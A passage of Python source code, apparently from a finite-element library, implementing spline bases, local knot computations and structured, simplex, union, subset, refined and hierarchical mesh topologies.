isinstance(knotmultiplicities[0], int):\n knotmultiplicities = [knotmultiplicities] * self.ndims\n else:\n assert len(knotmultiplicities) == self.ndims\n\n if not numpy.iterable(continuity):\n continuity = [continuity] * self.ndims\n else:\n assert len(continuity) == self.ndims\n\n vertex_structure = numpy.array(0)\n stdelems = []\n dofshape = []\n slices = []\n cache = {}\n for idim in range(self.ndims):\n p = degree[idim]\n n = self.shape[idim]\n isperiodic = idim in periodic\n\n c = continuity[idim]\n if c < 0:\n c += p\n assert -1 <= c < p\n\n k = knotvalues[idim]\n if k is None: #Defaults to uniform spacing\n k = numpy.arange(n+1)\n else:\n k = numpy.array(k)\n while len(k) < n+1:\n k_ = numpy.empty(len(k)*2-1)\n k_[::2] = k\n k_[1::2] = (k[:-1] + k[1:]) / 2\n k = k_\n assert len(k) == n+1, 'knot values do not match the topology size'\n\n m = knotmultiplicities[idim]\n if m is None: #Defaults to open spline without internal repetitions\n m = numpy.repeat(p-c, n+1)\n if not isperiodic:\n m[0] = m[-1] = p+1\n else:\n m = numpy.array(m)\n assert min(m) >0 and max(m) <= p+1, 'incorrect multiplicity encountered'\n 
while len(m) < n+1:\n m_ = numpy.empty(len(m)*2-1, dtype=int)\n m_[::2] = m\n m_[1::2] = p-c\n m = m_\n assert len(m) == n+1, 'knot multiplicity do not match the topology size'\n\n if not isperiodic:\n nd = sum(m)-p-1\n npre = p+1-m[0] #Number of knots to be appended to front\n npost = p+1-m[-1] #Number of knots to be appended to rear\n m[0] = m[-1] = p+1\n else:\n assert m[0]==m[-1], 'Periodic spline multiplicity expected'\n assert m[0]<p+1, 'Endpoint multiplicity for periodic spline should be p or smaller'\n nd = sum(m[:-1])\n npre = npost = 0\n k = numpy.concatenate([k[-p-1:-1]+k[0]-k[-1], k, k[1:1+p]-k[0]+k[-1]])\n m = numpy.concatenate([m[-p-1:-1], m, m[1:1+p]])\n km = numpy.array([ki for ki, mi in zip(k, m) for cnt in range(mi)], dtype=float)\n assert len(km) == sum(m)\n assert nd > 0, 'No basis functions defined. Knot vector too short.'\n\n stdelems_i = []\n slices_i = []\n offsets = numpy.cumsum(m[:-1])-p\n if isperiodic:\n offsets = offsets[p:-p]\n offset0 = offsets[0]+npre\n\n for offset in offsets:\n start = max(offset0-offset,0) #Zero unless prepending influence\n stop = p+1-max(offset-offsets[-1]+npost,0) #Zero unless appending influence\n slices_i.append(slice(offset-offset0+start,offset-offset0+stop))\n lknots = km[offset:offset+2*p] - km[offset] #Copy operation required\n if p: #Normalize for optimized caching\n lknots /= lknots[-1]\n key = (tuple(numeric.round(lknots*numpy.iinfo(numpy.int32).max)), p)\n try:\n coeffs = cache[key]\n except KeyError:\n coeffs = cache[key] = self._localsplinebasis(lknots)\n stdelems_i.append(coeffs[start:stop])\n stdelems.append(stdelems_i)\n\n numbers = numpy.arange(nd)\n if isperiodic:\n numbers = numpy.concatenate([numbers,numbers[:p]])\n vertex_structure = vertex_structure[...,_]*nd+numbers\n dofshape.append(nd)\n slices.append(slices_i)\n\n #Cache effectivity\n log.debug('Local knot vector cache effectivity: {}'.format(100*(1.-len(cache)/float(sum(self.shape)))))\n\n # deduplicate stdelems and compute tensorial products `unique` with indices `index`\n # such that unique[index[i,j]] == poly_outer_product(stdelems[0][i], stdelems[1][j])\n index = numpy.array(0)\n for stdelems_i in stdelems:\n unique_i = tuple(set(stdelems_i))\n unique = unique_i if not index.ndim \\\n else [numeric.poly_outer_product(a, b) for a in unique for b in unique_i]\n index = index[...,_] * len(unique_i) + tuple(map(unique_i.index, stdelems_i))\n\n coeffs = [unique[i] for i in index.flat]\n dofmap = [types.frozenarray(vertex_structure[S].ravel(), copy=False) for S in itertools.product(*slices)]\n return coeffs, dofmap, dofshape\n\n def basis_spline(self, degree, removedofs=None, knotvalues=None, knotmultiplicities=None, continuity=-1, periodic=None):\n 'spline basis'\n\n if removedofs is None or isinstance(removedofs[0], int):\n removedofs = [removedofs] * self.ndims\n else:\n assert len(removedofs) == self.ndims\n\n if periodic is None:\n periodic = self.periodic\n\n if numeric.isint(degree):\n degree = [degree]*self.ndims\n\n assert len(degree) == self.ndims\n\n if knotvalues is None or isinstance(knotvalues[0], (int,float)):\n knotvalues = [knotvalues] * self.ndims\n else:\n assert len(knotvalues) == self.ndims\n\n if knotmultiplicities is None or isinstance(knotmultiplicities[0], int):\n knotmultiplicities = [knotmultiplicities] * self.ndims\n else:\n assert len(knotmultiplicities) == self.ndims\n\n if not numpy.iterable(continuity):\n continuity = [continuity] * self.ndims\n else:\n assert len(continuity) == self.ndims\n\n start_dofs = []\n stop_dofs = []\n dofshape = []\n coeffs = []\n cache = {}\n for idim in range(self.ndims):\n p = degree[idim]\n n = self.shape[idim]\n\n c = continuity[idim]\n if c < 0:\n c += p\n assert -1 <= c < p\n\n k = knotvalues[idim]\n if k is None:\n k = numpy.arange(n+1) # default to uniform spacing\n else:\n k = numpy.array(k)\n while len(k) < n+1:\n k_ = numpy.empty(len(k)*2-1)\n 
k_[::2] = k\n k_[1::2] = (k[:-1] + k[1:]) / 2\n k = k_\n assert len(k) == n+1, 'knot values do not match the topology size'\n\n m = knotmultiplicities[idim]\n if m is None:\n m = numpy.repeat(p-c, n+1) # default to open spline without internal repetitions\n else:\n m = numpy.array(m)\n assert min(m) > 0 and max(m) <= p+1, 'incorrect multiplicity encountered'\n while len(m) < n+1:\n m_ = numpy.empty(len(m)*2-1, dtype=int)\n m_[::2] = m\n m_[1::2] = p-c\n m = m_\n assert len(m) == n+1, 'knot multiplicity do not match the topology size'\n\n if idim in periodic and not m[0] == m[n] == p+1: # if m[0] == m[n] == p+1 the spline is discontinuous at the boundary\n assert m[0] == m[n], 'periodic spline multiplicity expected'\n dk = k[n] - k[0]\n m = m[:n]\n k = k[:n]\n nd = m.sum()\n while m[n:].sum() < p - m[0] + 2:\n k = numpy.concatenate([k, k+dk])\n m = numpy.concatenate([m, m])\n dk *= 2\n km = numpy.array([ki for ki, mi in zip(k, m) for cnt in range(mi)], dtype=float)\n if p > m[0]:\n km = numpy.concatenate([km[-p+m[0]:] - dk, km])\n else:\n m[0] = m[-1] = p\n nd = m[:n].sum()+1\n km = numpy.array([ki for ki, mi in zip(k, m) for cnt in range(mi)], dtype=float)\n\n offsets = numpy.cumsum(m[:n]) - m[0]\n start_dofs.append(offsets)\n stop_dofs.append(offsets+p+1)\n dofshape.append(nd)\n\n coeffs_i = []\n for offset in offsets:\n lknots = km[offset:offset+2*p]\n key = tuple(numeric.round((lknots[1:-1]-lknots[0])/(lknots[-1]-lknots[0])*numpy.iinfo(numpy.int32).max)) if lknots.size else (), p\n try:\n local_coeffs = cache[key]\n except KeyError:\n local_coeffs = cache[key] = self._localsplinebasis(lknots)\n coeffs_i.append(local_coeffs)\n coeffs.append(tuple(coeffs_i))\n\n transforms_shape = tuple(axis.j-axis.i for axis in self.axes if axis.isdim)\n func = function.StructuredBasis(coeffs, start_dofs, stop_dofs, dofshape, transforms_shape, self.f_index, self.f_coords)\n if not any(removedofs):\n return func\n\n mask = numpy.ones((), dtype=bool)\n for idofs, ndofs in zip(removedofs, dofshape):\n mask = mask[...,_].repeat(ndofs, axis=-1)\n if idofs:\n mask[..., [numeric.normdim(ndofs,idof) for idof in idofs]] = False\n assert mask.shape == tuple(dofshape)\n return func[mask.ravel()]\n\n @staticmethod\n def _localsplinebasis(lknots):\n\n assert numeric.isarray(lknots), 'Local knot vector should be numpy array'\n p, rem = divmod(len(lknots), 2)\n assert rem == 0\n\n #Based on Algorithm A2.2 Piegl and Tiller\n N = [None]*(p+1)\n N[0] = numpy.poly1d([1.])\n\n if p > 0:\n\n assert numpy.less(lknots[:-1]-lknots[1:], numpy.spacing(1)).all(), 'Local knot vector should be non-decreasing'\n assert lknots[p]-lknots[p-1]>numpy.spacing(1), 'Element size should be positive'\n\n lknots = lknots.astype(float)\n\n xi = numpy.poly1d([lknots[p]-lknots[p-1],lknots[p-1]])\n\n left = [None]*p\n right = [None]*p\n\n for i in range(p):\n left[i] = xi - lknots[p-i-1]\n right[i] = -xi + lknots[p+i]\n saved = 0.\n for r in range(i+1):\n temp = N[r]/(lknots[p+r]-lknots[p+r-i-1])\n N[r] = saved+right[r]*temp\n saved = left[i-r]*temp\n N[i+1] = saved\n\n assert all(Ni.order==p for Ni in N)\n\n return types.frozenarray([Ni.coeffs[::-1] for Ni in N])\n\n def basis_std(self, *args, **kwargs):\n return __class__.basis_spline(self, *args, continuity=0, **kwargs)\n\n @property\n def refined(self):\n 'refine non-uniformly'\n\n axes = [axis.refined for axis in self.axes]\n return StructuredTopology(self.root, axes, self.nrefine+1, bnames=self._bnames)\n\n def locate(self, geom, coords, *, tol, eps=0, weights=None, **kwargs):\n coords = 
numpy.asarray(coords, dtype=float)\n if geom.ndim == 0:\n geom = geom[_]\n coords = coords[...,_]\n if not geom.shape == coords.shape[1:] == (self.ndims,):\n raise Exception('invalid geometry or point shape for {}D topology'.format(self.ndims))\n geom0, scale, index = self._asaffine(geom)\n e = self.sample('uniform', 2).eval(function.norm2(geom0 + index * scale - geom)).max() # inf-norm on non-gauss sample\n if e > tol:\n return super().locate(geom, coords, eps=eps, tol=tol, weights=weights, **kwargs)\n log.info('locate detected linear geometry: x = {} + {} xi ~{:+.1e}'.format(geom0, scale, e))\n return self._locate(geom0, scale, coords, eps=eps, weights=weights)\n\n def _asaffine(self, geom):\n index = function.rootcoords(len(self.axes))[[axis.isdim for axis in self.axes]] * 2**self.nrefine - [axis.i for axis in self.axes if axis.isdim]\n basis = function.concatenate([function.eye(self.ndims), function.diagonalize(index)], axis=0)\n A, b = map(sparse.toarray, self.sample('gauss', 2).integrate_sparse([(basis[:,_,:] * basis[_,:,:]).sum(-1), (basis * geom).sum(-1)]))\n x = numpy.linalg.solve(A, b)\n return x[:self.ndims], x[self.ndims:], index\n\n def _locate(self, geom0, scale, coords, *, eps=0, weights=None):\n mincoords, maxcoords = numpy.sort([geom0, geom0 + scale * self.shape], axis=0)\n outofbounds = numpy.less(coords, mincoords - eps) | numpy.greater(coords, maxcoords + eps)\n if outofbounds.any():\n raise LocateError('failed to locate {}/{} points'.format(outofbounds.any(axis=1).sum(), len(coords)))\n xi = (coords - geom0) / scale\n ielem = numpy.minimum(numpy.maximum(xi.astype(int), 0), numpy.array(self.shape)-1)\n return self._sample(numpy.ravel_multi_index(ielem.T, self.shape), xi - ielem, weights)\n\n def __str__(self):\n 'string representation'\n\n return '{}({})'.format(self.__class__.__name__, 'x'.join(str(n) for n in self.shape))\n\nclass ConnectedTopology(Topology):\n 'unstructured topology with connectivity'\n\n __slots__ = 'connectivity',\n\n @types.apply_annotations\n def __init__(self, references:types.strict[References], transforms:transformseq.stricttransforms, opposites:transformseq.stricttransforms, connectivity):\n assert len(connectivity) == len(references) and all(len(c) == e.nedges for c, e in zip(connectivity, references))\n self.connectivity = connectivity\n super().__init__(references, transforms, opposites)\n\nclass SimplexTopology(Topology):\n 'simplex topology'\n\n __slots__ = 'simplices', 'references', 'transforms', 'opposites'\n __cache__ = 'connectivity'\n\n def _renumber(simplices):\n simplices = numpy.asarray(simplices)\n keep = numpy.zeros(simplices.max()+1, dtype=bool)\n keep[simplices.flat] = True\n return types.frozenarray(simplices if keep.all() else (numpy.cumsum(keep)-1)[simplices], copy=False)\n\n @types.apply_annotations\n def __init__(self, simplices:_renumber, transforms:transformseq.stricttransforms, opposites:transformseq.stricttransforms):\n assert simplices.shape == (len(transforms), transforms.fromdims+1)\n assert numpy.greater(simplices[:,1:], simplices[:,:-1]).all(), 'nodes should be sorted'\n assert not numpy.equal(simplices[:,1:], simplices[:,:-1]).any(), 'duplicate nodes'\n self.simplices = simplices\n references = References.uniform(element.getsimplex(transforms.fromdims), len(transforms))\n super().__init__(references, transforms, opposites)\n\n @property\n def connectivity(self):\n nverts = self.ndims + 1\n edge_vertices = numpy.arange(nverts).repeat(self.ndims).reshape(self.ndims, nverts)[:,::-1].T # nverts x ndims\n 
simplices_edges = self.simplices.take(edge_vertices, axis=1) # nelems x nverts x ndims\n elems, edges = divmod(numpy.lexsort(simplices_edges.reshape(-1, self.ndims).T), nverts)\n sorted_simplices_edges = simplices_edges[elems, edges] # (nelems x nverts) x ndims; matching edges are now adjacent\n i, = numpy.equal(sorted_simplices_edges[1:], sorted_simplices_edges[:-1]).all(axis=1).nonzero()\n j = i + 1\n assert numpy.greater(i[1:], j[:-1]).all(), 'single edge is shared by three or more simplices'\n connectivity = numpy.full((len(self.simplices), self.ndims+1), fill_value=-1, dtype=int)\n connectivity[elems[i],edges[i]] = elems[j]\n connectivity[elems[j],edges[j]] = elems[i]\n return types.frozenarray(connectivity, copy=False)\n\n def basis_std(self, degree):\n if degree == 1:\n coeffs = element.getsimplex(self.ndims).get_poly_coeffs('bernstein', degree=1)\n return function.PlainBasis([coeffs] * len(self), self.simplices, self.simplices.max()+1, self.f_index, self.f_coords)\n return super().basis_std(degree)\n\n def basis_bubble(self):\n 'bubble from vertices'\n\n bernstein = element.getsimplex(self.ndims).get_poly_coeffs('bernstein', degree=1)\n bubble = functools.reduce(numeric.poly_mul, bernstein)\n coeffs = numpy.zeros((len(bernstein)+1,) + bubble.shape)\n coeffs[(slice(-1),)+(slice(2),)*self.ndims] = bernstein\n coeffs[-1] = bubble\n coeffs[:-1] -= bubble / (self.ndims+1)\n coeffs = types.frozenarray(coeffs, copy=False)\n nverts = self.simplices.max() + 1\n ndofs = nverts + len(self)\n nmap = [types.frozenarray(numpy.hstack([idofs, nverts+ielem]), copy=False) for ielem, idofs in enumerate(self.simplices)]\n return function.PlainBasis([coeffs] * len(self), nmap, ndofs, self.f_index, self.f_coords)\n\nclass UnionTopology(Topology):\n 'grouped topology'\n\n __slots__ = '_topos', '_names', 'references', 'transforms', 'opposites'\n\n @types.apply_annotations\n def __init__(self, topos:types.tuple[stricttopology], names:types.tuple[types.strictstr]=()):\n self._topos = topos\n self._names = tuple(names)[:len(self._topos)]\n assert len(set(self._names)) == len(self._names), 'duplicate name'\n ndims = self._topos[0].ndims\n assert all(topo.ndims == ndims for topo in self._topos)\n\n references = []\n selections = [[] for topo in topos]\n for trans, indices in util.gather((trans, (itopo, itrans)) for itopo, topo in enumerate(self._topos) for itrans, trans in enumerate(topo.transforms)):\n itopo0, itrans0 = indices[0]\n selections[itopo0].append(itrans0)\n if len(indices) == 1:\n references.append(self._topos[itopo0].references[itrans0])\n else:\n refs = [self._topos[itopo].references[itrans] for itopo, itrans in indices]\n while len(refs) > 1: # sweep all possible unions until a single reference is left\n nrefs = len(refs)\n iref = 0\n while iref < len(refs)-1:\n for jref in range(iref+1, len(refs)):\n try:\n unionref = refs[iref] | refs[jref]\n except TypeError:\n pass\n else:\n refs[iref] = unionref\n del refs[jref]\n break\n iref += 1\n assert len(refs) < nrefs, 'incompatible elements in union'\n references.append(refs[0])\n assert len(set(self._topos[itopo].opposites[itrans] for itopo, itrans in indices)) == 1\n selections = tuple(map(types.frozenarray[int], selections))\n\n super().__init__(\n References.from_iter(references, ndims),\n transformseq.chain((topo.transforms[selection] for topo, selection in zip(topos, selections)), ndims),\n transformseq.chain((topo.opposites[selection] for topo, selection in zip(topos, selections)), ndims))\n\n def getitem(self, item):\n topos = [topo if name 
== item else topo.getitem(item) for topo, name in itertools.zip_longest(self._topos, self._names)]\n return functools.reduce(operator.or_, topos, EmptyTopology(self.ndims))\n\n def __or__(self, other):\n if not isinstance(other, UnionTopology):\n return UnionTopology(self._topos + (other,), self._names)\n return UnionTopology(self._topos[:len(self._names)] + other._topos + self._topos[len(self._names):], self._names + other._names)\n\n @property\n def refined(self):\n return UnionTopology([topo.refined for topo in self._topos], self._names)\n\nclass DisjointUnionTopology(Topology):\n 'grouped topology'\n\n __slots__ = '_topos', '_names'\n\n @types.apply_annotations\n def __init__(self, topos:types.tuple[stricttopology], names:types.tuple[types.strictstr]=()):\n self._topos = topos\n self._names = tuple(names)[:len(self._topos)]\n assert len(set(self._names)) == len(self._names), 'duplicate name'\n ndims = self._topos[0].ndims\n assert all(topo.ndims == ndims for topo in self._topos)\n super().__init__(\n util.sum(topo.references for topo in self._topos),\n transformseq.chain((topo.transforms for topo in self._topos), ndims),\n transformseq.chain((topo.opposites for topo in self._topos), ndims))\n\n def getitem(self, item):\n topos = [topo if name == item else topo.getitem(item) for topo, name in itertools.zip_longest(self._topos, self._names)]\n topos = [topo for topo in topos if not isinstance(topo, EmptyTopology)]\n if len(topos) == 0:\n return EmptyTopology(self.ndims)\n elif len(topos) == 1:\n return topos[0]\n else:\n return DisjointUnionTopology(topos)\n\n @property\n def refined(self):\n return DisjointUnionTopology([topo.refined for topo in self._topos], self._names)\n\nclass SubsetTopology(Topology):\n 'trimmed'\n\n __slots__ = 'refs', 'basetopo', 'newboundary', '_indices'\n __cache__ = 'connectivity', 'boundary', 'interfaces', 'refined'\n\n @types.apply_annotations\n def __init__(self, basetopo:stricttopology, refs:types.tuple[element.strictreference], newboundary=None):\n if newboundary is not None:\n assert isinstance(newboundary, str) or isinstance(newboundary, Topology) and newboundary.ndims == basetopo.ndims-1\n assert len(refs) == len(basetopo)\n self.refs = refs\n self.basetopo = basetopo\n self.newboundary = newboundary\n\n self._indices = types.frozenarray(numpy.array([i for i, ref in enumerate(self.refs) if ref], dtype=int), copy=False)\n references = References.from_iter(self.refs, self.basetopo.ndims).take(self._indices)\n transforms = self.basetopo.transforms[self._indices]\n opposites = self.basetopo.opposites[self._indices]\n super().__init__(references, transforms, opposites)\n\n def getitem(self, item):\n return self.basetopo.getitem(item).subset(self, strict=False)\n\n def __rsub__(self, other):\n if self.basetopo == other:\n refs = [baseref - ref for baseref, ref in zip(self.basetopo.references, self.refs)]\n return SubsetTopology(self.basetopo, refs, ~self.newboundary if isinstance(self.newboundary,Topology) else self.newboundary)\n return super().__rsub__(other)\n\n def __or__(self, other):\n if not isinstance(other, SubsetTopology) or self.basetopo != other.basetopo:\n return super().__or__(other)\n refs = [ref1 | ref2 for ref1, ref2 in zip(self.refs, other.refs)]\n if all(baseref == ref for baseref, ref in zip(self.basetopo.references, refs)):\n return self.basetopo\n return SubsetTopology(self.basetopo, refs) # TODO boundary\n\n @property\n def connectivity(self):\n mask = numpy.array([bool(ref) for ref in self.refs] + [False]) # trailing false serves to 
map -1 to -1\n renumber = numpy.cumsum(mask)-1\n renumber[~mask] = -1\n return tuple(types.frozenarray(renumber.take(ioppelems).tolist() + [-1] * (ref.nedges - len(ioppelems))) for ref, ioppelems in zip(self.refs, self.basetopo.connectivity) if ref)\n\n @property\n def refined(self):\n child_refs = self.references.children\n indices = types.frozenarray(numpy.array([i for i, ref in enumerate(child_refs) if ref], dtype=int), copy=False)\n refined_transforms = self.transforms.refined(self.references)[indices]\n self_refined = Topology(child_refs[indices], refined_transforms, refined_transforms)\n return self.basetopo.refined.subset(self_refined, self.newboundary.refined if isinstance(self.newboundary,Topology) else self.newboundary, strict=True)\n\n @property\n def boundary(self):\n baseboundary = self.basetopo.boundary\n baseconnectivity = self.basetopo.connectivity\n brefs = [ref.empty for ref in baseboundary.references]\n trimmedreferences = []\n trimmedtransforms = []\n trimmedopposites = []\n for ielem, newref in enumerate(self.refs):\n if not newref:\n continue\n elemtrans = self.basetopo.transforms[ielem]\n # The first edges of newref by convention share location with the edges\n # of the original reference. We can therefore use baseconnectivity to\n # locate opposing edges.\n ioppelems = baseconnectivity[ielem]\n for (edgetrans, edgeref), ioppelem in zip(newref.edges, ioppelems):\n if not edgeref:\n continue\n if ioppelem == -1:\n # If the edge had no opposite in basetopology then it must already be\n # in baseboundary, so we can use index to locate it.\n brefs[baseboundary.transforms.index(elemtrans+(edgetrans,))] = edgeref\n else:\n # If the edge did have an opposite in basetopology then there is a\n # possibility this opposite (partially) disappeared, in which case\n # the exposed part is added to the trimmed group.\n ioppedge = baseconnectivity[ioppelem].index(ielem)\n oppref = self.refs[ioppelem]\n edgeref -= oppref.edge_refs[ioppedge]\n if edgeref:\n trimmedreferences.append(edgeref)\n trimmedtransforms.append(elemtrans+(edgetrans,))\n trimmedopposites.append(self.basetopo.transforms[ioppelem]+(oppref.edge_transforms[ioppedge],))\n # The last edges of newref (beyond the number of edges of the original)\n # cannot have opposites and are added to the trimmed group directly.\n for edgetrans, edgeref in newref.edges[len(ioppelems):]:\n trimmedreferences.append(edgeref)\n trimmedtransforms.append(elemtrans+(edgetrans,))\n trimmedopposites.append(elemtrans+(edgetrans.flipped,))\n origboundary = SubsetTopology(baseboundary, brefs)\n if isinstance(self.newboundary, Topology):\n trimmedbrefs = [ref.empty for ref in self.newboundary.references]\n for ref, trans in zip(trimmedreferences, trimmedtransforms):\n trimmedbrefs[self.newboundary.transforms.index(trans)] = ref\n trimboundary = SubsetTopology(self.newboundary, trimmedbrefs)\n else:\n trimboundary = Topology(References.from_iter(trimmedreferences, self.ndims-1), transformseq.PlainTransforms(trimmedtransforms, self.ndims-1), transformseq.PlainTransforms(trimmedopposites, self.ndims-1))\n return DisjointUnionTopology([trimboundary, origboundary], names=[self.newboundary] if isinstance(self.newboundary,str) else [])\n\n @property\n def interfaces(self):\n baseinterfaces = self.basetopo.interfaces\n superinterfaces = super().interfaces\n irefs = [ref.empty for ref in baseinterfaces.references]\n for ref, trans, opp in zip(superinterfaces.references, superinterfaces.transforms, superinterfaces.opposites):\n try:\n iielem = 
baseinterfaces.transforms.index(trans)\n except ValueError:\n iielem = baseinterfaces.transforms.index(opp)\n irefs[iielem] = ref\n return SubsetTopology(baseinterfaces, irefs)\n\n @log.withcontext\n def basis(self, name, *args, **kwargs):\n if isinstance(self.basetopo, HierarchicalTopology):\n warnings.warn('basis may be linearly dependent; a linearly independent basis is obtained by trimming first, then creating hierarchical refinements')\n basis = self.basetopo.basis(name, *args, **kwargs)\n return function.PrunedBasis(basis, self._indices, self.f_index, self.f_coords)\n\n def locate(self, geom, coords, *, eps=0, **kwargs):\n sample = self.basetopo.locate(geom, coords, eps=eps, **kwargs)\n for isampleelem, (transforms, points) in enumerate(zip(sample.transforms[0], sample.points)):\n ielem = self.basetopo.transforms.index(transforms)\n ref = self.refs[ielem]\n if ref != self.basetopo.references[ielem]:\n for i, coord in enumerate(points.coords):\n if not ref.inside(coord, eps):\n raise LocateError('failed to locate point: {}'.format(coords[sample.getindex(isampleelem)[i]]))\n return sample\n\nclass RefinedTopology(Topology):\n 'refinement'\n\n __slots__ = 'basetopo',\n __cache__ = 'boundary', 'connectivity'\n\n @types.apply_annotations\n def __init__(self, basetopo:stricttopology):\n self.basetopo = basetopo\n super().__init__(\n self.basetopo.references.children,\n self.basetopo.transforms.refined(self.basetopo.references),\n self.basetopo.opposites.refined(self.basetopo.references))\n\n def getitem(self, item):\n return self.basetopo.getitem(item).refined\n\n @property\n def boundary(self):\n return self.basetopo.boundary.refined\n\n @property\n def connectivity(self):\n offsets = numpy.cumsum([0] + [ref.nchildren for ref in self.basetopo.references])\n connectivity = [offset + edges for offset, ref in zip(offsets, self.basetopo.references) for edges in ref.connectivity]\n for ielem, edges in enumerate(self.basetopo.connectivity):\n for iedge, jelem in enumerate(edges):\n if jelem == -1:\n for ichild, ichildedge in self.basetopo.references[ielem].edgechildren[iedge]:\n connectivity[offsets[ielem]+ichild][ichildedge] = -1\n elif jelem < ielem:\n jedge = self.basetopo.connectivity[jelem].index(ielem)\n for (ichild, ichildedge), (jchild, jchildedge) in zip(self.basetopo.references[ielem].edgechildren[iedge], self.basetopo.references[jelem].edgechildren[jedge]):\n connectivity[offsets[ielem]+ichild][ichildedge] = offsets[jelem]+jchild\n connectivity[offsets[jelem]+jchild][jchildedge] = offsets[ielem]+ichild\n return tuple(types.frozenarray(c, copy=False) for c in connectivity)\n\nclass HierarchicalTopology(Topology):\n 'collection of nested topology elements'\n\n __slots__ = 'basetopo', 'levels', '_indices_per_level', '_offsets'\n __cache__ = 'refined', 'boundary', 'interfaces'\n\n @types.apply_annotations\n def __init__(self, basetopo:stricttopology, indices_per_level:types.tuple[types.frozenarray[types.strictint]]):\n 'constructor'\n\n assert not isinstance(basetopo, HierarchicalTopology)\n self.basetopo = basetopo\n self._indices_per_level = indices_per_level\n self._offsets = numpy.cumsum([0, *map(len, self._indices_per_level)], dtype=int)\n\n level = None\n levels = []\n references = References.empty(basetopo.ndims)\n transforms = []\n opposites = []\n for indices in indices_per_level:\n level = self.basetopo if level is None else level.refined\n levels.append(level)\n if len(indices):\n references = references.chain(level.references.take(indices))\n 
transforms.append(level.transforms[indices])\n opposites.append(level.opposites[indices])\n self.levels = tuple(levels)\n\n super().__init__(references, transformseq.chain(transforms, basetopo.ndims), transformseq.chain(opposites, basetopo.ndims))\n\n def __and__(self, other):\n if not isinstance(other, HierarchicalTopology) or self.basetopo != other.basetopo:\n return super().__and__(other)\n indices_per_level = []\n levels = max(self.levels, other.levels, key=len)\n for level, self_indices, other_indices in itertools.zip_longest(levels, self._indices_per_level, other._indices_per_level, fillvalue=()):\n keep = numpy.zeros(len(level), dtype=bool)\n for topo, topo_indices, indices in (other, other_indices, self_indices), (self, self_indices, other_indices):\n mask = numeric.asboolean(topo_indices, len(level))\n for index in indices: # keep common elements or elements which are finer than counterpart\n keep[index] = mask[index] or topo.transforms.contains_with_tail(level.transforms[index])\n indices, = keep.nonzero()\n indices_per_level.append(indices)\n return HierarchicalTopology(self.basetopo, indices_per_level)\n\n def getitem(self, item):\n itemtopo = self.basetopo.getitem(item)\n itemindices_per_level = []\n for baseindices, baselevel, itemlevel in zip(self._indices_per_level, self.basetopo.refine_iter, itemtopo.refine_iter):\n itemindices = []\n itemindex = itemlevel.transforms.index\n for basetrans in map(baselevel.transforms.__getitem__, baseindices):\n try:\n itemindices.append(itemindex(basetrans))\n except ValueError:\n pass\n itemindices_per_level.append(numpy.unique(numpy.array(itemindices, dtype=int)))\n return HierarchicalTopology(itemtopo, itemindices_per_level)\n\n def refined_by(self, refine):\n refine = tuple(refine)\n if not all(map(numeric.isint, refine)):\n refine = tuple(self.transforms.index_with_tail(item)[0] for item in refine)\n refine = numpy.unique(numpy.array(refine, dtype=int))\n splits = numpy.searchsorted(refine, self._offsets, side='left')\n indices_per_level = list(map(list, self._indices_per_level))+[[]]\n fine = self.basetopo\n for ilevel, (start, stop) in enumerate(zip(splits[:-1], splits[1:])):\n coarse, fine = fine, fine.refined\n coarse_indices = tuple(map(indices_per_level[ilevel].pop, reversed(refine[start:stop]-self._offsets[ilevel])))\n coarse_transforms = map(coarse.transforms.__getitem__, coarse_indices)\n coarse_references = map(coarse.references.__getitem__, coarse_indices)\n fine_transforms = (trans+(ctrans,) for trans, ref in zip(coarse_transforms, coarse_references) for ctrans, cref in ref.children if cref)\n indices_per_level[ilevel+1].extend(map(fine.transforms.index, fine_transforms))\n if not indices_per_level[-1]:\n indices_per_level.pop(-1)\n return HierarchicalTopology(self.basetopo, ([numpy.unique(numpy.array(i, dtype=int)) for i in indices_per_level]))\n\n @property\n def refined(self):\n refined_indices_per_level = [[]]\n fine = self.basetopo\n for coarse_indices in self._indices_per_level:\n coarse, fine = fine, fine.refined\n coarse_transforms = map(coarse.transforms.__getitem__, coarse_indices)\n coarse_references = map(coarse.references.__getitem__, coarse_indices)\n fine_transforms = (trans+(ctrans,) for trans, ref in zip(coarse_transforms, coarse_references) for ctrans, cref in ref.children if cref)\n refined_indices_per_level.append(numpy.unique(numpy.fromiter(map(fine.transforms.index, fine_transforms), dtype=int)))\n return HierarchicalTopology(self.basetopo, refined_indices_per_level)\n\n @property\n @log.withcontext\n 
def boundary(self):\n 'boundary elements'\n\n basebtopo = self.basetopo.boundary\n bindices_per_level = []\n for indices, level, blevel in zip(self._indices_per_level, self.basetopo.refine_iter, basebtopo.refine_iter):\n bindex = blevel.transforms.index\n bindices = []\n for index in indices:\n for etrans, eref in level.references[index].edges:\n if eref:\n trans = level.transforms[index]+(etrans,)\n try:\n bindices.append(bindex(trans))\n except ValueError:\n pass\n bindices = numpy.array(bindices, dtype=int)\n if len(bindices) > 1:\n bindices.sort()\n assert not numpy.equal(bindices[1:], bindices[:-1]).any()\n bindices_per_level.append(bindices)\n return HierarchicalTopology(basebtopo, bindices_per_level)\n\n @property\n @log.withcontext\n def interfaces(self):\n 'interfaces'\n\n hreferences = References.empty(self.ndims-1)\n htransforms = []\n hopposites = []\n for level, indices in zip(self.levels, self._indices_per_level):\n selection = []\n to = level.interfaces.transforms, level.interfaces.opposites\n for trans, ref in zip(map(level.transforms.__getitem__, indices), map(level.references.__getitem__, indices)):\n for etrans, eref in ref.edges:\n if not eref:\n continue\n for transforms, opposites in to, to[::-1]:\n try:\n i = transforms.index(trans+(etrans,))\n except ValueError:\n continue\n if self.transforms.contains_with_tail(opposites[i]):\n selection.append(i)\n break\n if selection:\n selection = types.frozenarray(numpy.unique(selection))\n hreferences = hreferences.chain(level.interfaces.references.take(selection))\n htransforms.append(level.interfaces.transforms[selection])\n hopposites.append(level.interfaces.opposites[selection])\n return Topology(hreferences, transformseq.chain(htransforms, self.ndims-1), transformseq.chain(hopposites, self.ndims-1))\n\n @log.withcontext\n def basis(self, name, *args, truncation_tolerance=1e-15, **kwargs):\n '''Create hierarchical basis.\n\n A hierarchical basis is constructed from bases on different levels of\n uniform refinement. Two different types of hierarchical bases are\n supported:\n\n 1. Classical -- Starting from the set of all basis functions originating\n from all levels of uniform refinement, only those basis functions are\n selected for which at least one supporting element is part of the\n hierarchical topology.\n\n 2. Truncated -- Like classical, but with basis functions modified such that\n the area of support is reduced. An additional effect of this procedure is\n that it restores partition of unity. The spanned function space remains\n unchanged.\n\n Truncation is based on linear combinations of basis functions, where fine\n level basis functions are used to reduce the support of coarser level basis\n functions. See `Giannelli et al. 2012`_ for more information on truncated\n hierarchical refinement.\n\n .. _`Giannelli et al. 2012`: 